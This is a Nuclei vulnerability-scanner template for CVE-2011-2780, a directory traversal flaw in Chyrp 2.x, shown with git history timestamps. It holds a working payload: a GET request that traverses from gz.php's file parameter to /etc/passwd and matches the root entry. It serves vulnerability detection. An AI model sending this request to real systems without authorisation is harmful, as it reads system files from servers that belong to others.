my-nuclei-templates/CVE-2011-2780.yaml

40 lines
1.4 KiB
YAML
Raw Permalink Normal View History

2021-09-17 06:03:58 +00:00
id: CVE-2011-2780
info:
2022-06-18 08:05:25 +00:00
name: Chyrp 2.x - Local File Inclusion
2021-09-17 06:03:58 +00:00
author: daffainfo
severity: high
2022-06-18 08:05:25 +00:00
description: A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744.
2021-09-17 06:03:58 +00:00
reference:
- http://www.justanotherhacker.com/advisories/JAHx113.txt
- http://www.openwall.com/lists/oss-security/2011/07/13/5
- http://www.ocert.org/advisories/ocert-2011-001.html
- http://www.openwall.com/lists/oss-security/2011/07/13/6
2022-06-18 08:05:25 +00:00
- http://web.archive.org/web/20210121214023/https://www.securityfocus.com/bid/48672/
2021-09-17 06:03:58 +00:00
- http://secunia.com/advisories/45184
- http://securityreason.com/securityalert/8312
- https://exchange.xforce.ibmcloud.com/vulnerabilities/68565
2022-06-18 08:05:25 +00:00
- http://web.archive.org/web/20201207104106/https://www.securityfocus.com/archive/1/518890/100/0/threaded
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2011-2780
tags: cve,cve2011,lfi,chyrp
2021-09-17 06:03:58 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
2022-06-18 08:05:25 +00:00
- "root:.*:0:0:"
2021-09-17 06:03:58 +00:00
- type: status
status:
- 200
2022-06-18 08:05:25 +00:00
# Enhanced by mp on 2022/02/18